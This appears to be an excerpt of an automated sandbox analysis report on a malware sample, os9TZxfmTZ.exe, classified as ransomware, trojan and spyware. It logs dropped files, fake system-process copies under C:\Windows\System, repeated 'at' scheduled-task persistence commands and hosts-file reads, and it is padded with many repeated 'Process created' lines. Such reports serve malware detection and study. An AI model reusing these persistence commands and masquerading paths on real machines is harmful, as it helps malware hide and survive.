Source: os9TZxfmTZ.exe	Binary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
Source: explorer.exe, 00000004.00000002.366780005.000000000042C000.00000004.00020000.sdmp	Binary or memory string: `P@*\AD:\Code\Explorer\Explorer.vbp

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@420/11@11/4

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe

File created: C:\Users\user\AppData\Local\icsys.icn.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_01

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe

File created: C:\Users\user\AppData\Local\Temp\~DF31C8E74B7E14456D.TMP

Jump to behavior

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe
Source: unknown	Process created: C:\Windows\System\explorer.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe

Source: os9TZxfmTZ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\explorer.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\spoolsv.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\svchost.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\spoolsv.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\explorer.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: os9TZxfmTZ.exe	Virustotal: Detection: 82%
Source: os9TZxfmTZ.exe	ReversingLabs: Detection: 95%

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe

File read: C:\Users\user\Desktop\os9TZxfmTZ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\os9TZxfmTZ.exe 'C:\Users\user\Desktop\os9TZxfmTZ.exe'
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe
Source: C:\Windows\System\explorer.exe	Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SE
Source: C:\Windows\System\spoolsv.exe	Process created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PR
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: unknown	Process created: C:\Windows\System\explorer.exe 'C:\windows\system\explorer.exe' RO
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe
Source: C:\Windows\System\explorer.exe	Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SE
Source: C:\Windows\System\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System\spoolsv.exe	Process created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PR
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
